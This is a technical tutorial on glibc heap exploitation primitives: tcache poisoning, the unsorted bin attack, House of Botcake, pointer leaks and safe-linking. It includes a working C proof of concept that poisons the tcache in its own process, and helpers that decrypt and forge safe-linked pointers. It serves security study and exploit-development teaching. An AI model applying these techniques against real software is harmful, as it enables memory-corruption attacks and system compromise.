Heap Exploitation Primitives

A structured overview of the core primitives used in glibc heap exploitation.

Overview

Modern heap exploitation relies on a small set of repeatable primitives. Understanding them as isolated building blocks makes it easier to chain them into full exploits.

Primitives

Arbitrary Write

The ability to write a controlled value to an arbitrary address. Often achieved via:

  • unsorted bin attack — corrupts the bk pointer of a chunk in the unsorted bin so that the next malloc that walks the bin writes the address of the bin head (a libc address inside main_arena, not a heap address) to the chosen target; glibc 2.29 added the bck->fd != victim check that aborts on this
  • tcache poisoning — corrupts the next pointer of a freed chunk in a tcache bin so that a later malloc of that size returns an attacker-chosen address
  • House of Botcake — combines tcache and unsorted-bin consolidation to get overlapping chunks from a double free that survives the tcache key check added in glibc 2.29; it does not bypass safe-linking, which still needs a heap leak

// tcache poisoning sketch (glibc 2.26 to 2.31, before safe-linking)
free(chunk_B); free(chunk_A);      // bin for this size now holds A -> B, count 2
*(void **)chunk_A = target_addr;   // UAF write: A's next pointer lives in its first 8 bytes
malloc(size);                      // returns chunk_A
malloc(size);                      // returns target_addr

Arbitrary Read

Reading memory at an arbitrary address, in practice usually reading back a chunk whose allocator metadata is still visible (for example through a use-after-free or an overlapping chunk). Useful for leaking:

  • libc base from unsorted or small bin fd/bk pointers, which point into main_arena
  • heap base from tcache next or fastbin fd pointers (with safe-linking, the last entry of a bin stores its own user address >> 12, which is the key)
  • PIE base from pointers into the binary stored on the heap (vtables, function pointers)
  • stack addresses from libc's environ variable, once libc base is known

Allocation Primitive

Forcing malloc to return a specific address. This is how the tcache and fastbin corruptions above turn into a write: once malloc hands back the target address, the program's own writes into the "new" allocation land on the target. On glibc 2.32 and later the returned address must be 16-byte aligned, because tcache_get aborts with "malloc(): unaligned tcache chunk detected" otherwise; a fastbin target additionally needs a plausible size field at target - 8, or malloc aborts with "malloc(): memory corruption (fast)".
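The sketch in the Arbitrary Write section and the allocation primitive described here, worked through end to end against the host's own glibc in the style of how2heap's tcache_poisoning.c. This is an added example, not code from the original page: the use-after-free is simulated by keeping the freed pointers, target_buf is a constructed stand-in for the attacker's target, and the program reads the next pointer that free() left behind to decide whether safe-linking (glibc 2.32 and later) is in effect, so it runs on either side of that change.

```c
/* Added example: tcache poisoning against the running glibc.
   Needs a glibc with tcache (2.26 or later). */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CHUNK_SIZE 0x40   /* user size; both chunks land in the same tcache bin */

/* Constructed stand-in for the address an attacker wants malloc to hand out.
   16-byte alignment matters: tcache_get rejects unaligned entries since 2.32. */
static uint64_t target_buf[8] __attribute__((aligned(16)));

/* Runs the poisoning; returns 1 if the second malloc(CHUNK_SIZE) returned target_buf. */
static int run_tcache_poisoning(void)
{
    uintptr_t target = (uintptr_t)target_buf;

    /* volatile keeps the compiler from drawing conclusions from the freed pointers */
    uint8_t *volatile a = malloc(CHUNK_SIZE);
    uint8_t *volatile b = malloc(CHUNK_SIZE);
    if (!a || !b)
        return 0;

    /* Two frees, so the bin's count is 2 and both later mallocs are served
       from it. B goes in first, then A: the bin is A -> B. */
    free(b);
    free(a);

    /* Simulated use-after-free read: A's first 8 bytes are its tcache next field.
       Before 2.32 that is B's address; with safe-linking it is (a >> 12) ^ b.
       Comparing against b tells us which one we got, i.e. whether a key is needed. */
    uintptr_t stored = *(uintptr_t *)a;
    uintptr_t key = (stored == (uintptr_t)b) ? 0 : ((uintptr_t)a >> 12);

    /* Leave the bin terminated after the hijack: when malloc returns target_buf it
       reads target_buf[0] as the next entry (and unmangles it on 2.32+), so store
       the value that decodes to NULL. */
    memset(target_buf, 0, sizeof target_buf);
    target_buf[0] = key ? (uint64_t)(target >> 12) : 0;

    /* Simulated use-after-free write: point A's next field at the target,
       mangled with the key if safe-linking is active. */
    *(uintptr_t *)a = key ^ target;

    void *first  = malloc(CHUNK_SIZE);   /* A comes back, bin head becomes target_buf */
    void *second = malloc(CHUNK_SIZE);   /* the poisoned entry: target_buf */

    return first == (void *)a && second == (void *)target;
}

int main(void)
{
    printf("second malloc returned target_buf: %s\n",
           run_tcache_poisoning() ? "yes" : "no");
    return 0;
}
```

The two chunks handed out at the end are deliberately never freed: the bin's count is already 0, and freeing target_buf would hand a non-heap pointer back to the allocator.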

Safe-Linking (glibc ≥ 2.32)

Since 2.32, tcache next and fastbin fd pointers are stored mangled (PROTECT_PTR in malloc.c):

stored = (pos >> 12) ^ next

where pos is the address at which the pointer is stored, i.e. the freed chunk's user pointer, and next is the real pointer (NULL for the last entry in a bin). The key is therefore the page number of the chunk doing the storing, and it is never secret: a leak of the last entry of a bin gives pos >> 12 directly, and any heap leak lets you compute it. To poison a bin you write (chunk >> 12) ^ target instead of target, where chunk is the address of the entry you are corrupting. tcache_get also rejects entries that are not 16-byte aligned, so target must be aligned.
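The safe-linking arithmetic above as the handful of C helpers worth keeping next to an exploit for glibc 2.32 and later: mangling and unmangling as malloc.c does it, recovering a pointer from a single mangled value without any other leak (the how2heap decrypt_safe_linking trick), and computing the value to write when poisoning. This is an added example, not code from the original page; the addresses are constructed sample values, not leaks from a real process.

```c
/* Added example: safe-linking helpers mirroring glibc's PROTECT_PTR / REVEAL_PTR. */
#include <stdint.h>
#include <stdio.h>

#define SAFE_LINKING_SHIFT 12

/* glibc: PROTECT_PTR(pos, ptr) = ((size_t)pos >> 12) ^ (size_t)ptr.
   pos is the address the pointer is stored at, i.e. the freed chunk's
   user pointer (its next field sits in the first 8 bytes of user data). */
static uintptr_t protect_ptr(uintptr_t pos, uintptr_t ptr)
{
    return (pos >> SAFE_LINKING_SHIFT) ^ ptr;
}

/* REVEAL_PTR is the same XOR; the key is symmetric. Leaking the last entry of
   a bin (next == NULL) therefore yields pos >> 12, the key, with nothing to undo. */
static uintptr_t reveal_ptr(uintptr_t pos, uintptr_t stored)
{
    return (pos >> SAFE_LINKING_SHIFT) ^ stored;
}

/* Recover a pointer from its mangled form alone. The key has been shifted right
   by 12, so the top 12 bits of stored are the top 12 bits of the pointer; each
   round uses the bits recovered so far as the key for the next 12. Exact whenever
   the storing chunk and the pointed-to chunk agree above bit 15 (same 64 KiB-aligned
   region), which adjacent chunks on one heap normally do. */
static uintptr_t decrypt_same_region(uintptr_t stored)
{
    uintptr_t key = 0, plain = 0;
    for (int i = 1; i < 6; i++) {
        int bits = 64 - 12 * i;          /* low bits still unknown in this round */
        if (bits < 0)
            bits = 0;
        plain = ((stored ^ key) >> bits) << bits;
        key = plain >> SAFE_LINKING_SHIFT;
    }
    return plain;                        /* low 4 bits are 0; chunks are 16-byte aligned */
}

/* Value to write into the poisoned chunk's next field so that malloc returns target.
   Returns 0 when target fails the alignment check tcache_get performs since 2.32
   ("malloc(): unaligned tcache chunk detected"). */
static uintptr_t forge_next(uintptr_t poisoned_chunk, uintptr_t target)
{
    if (target & 0xf)
        return 0;
    return protect_ptr(poisoned_chunk, target);
}

int main(void)
{
    /* constructed sample addresses: two adjacent chunks on one heap page and a
       16-byte aligned target somewhere in libc */
    uintptr_t chunk_a = 0x55555555a2a0UL, chunk_b = 0x55555555a2e0UL;
    uintptr_t target = 0x7ffff7e1b000UL;

    uintptr_t stored_b = protect_ptr(chunk_b, 0);        /* B freed first: last entry */
    uintptr_t stored_a = protect_ptr(chunk_a, chunk_b);  /* A freed second: A -> B */

    printf("key leaked from last entry: 0x%lx\n", (unsigned long)stored_b);
    printf("A->next revealed with key:  0x%lx\n", (unsigned long)reveal_ptr(chunk_a, stored_a));
    printf("A->next recovered blind:    0x%lx\n", (unsigned long)decrypt_same_region(stored_a));
    printf("write into A->next:         0x%lx\n", (unsigned long)forge_next(chunk_a, target));
    return 0;
}
```

decrypt_same_region is the fallback when the only leak is a mangled pointer from the middle of a bin; when the leak is the bin's last entry, the stored value is the key itself and no decryption is needed.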
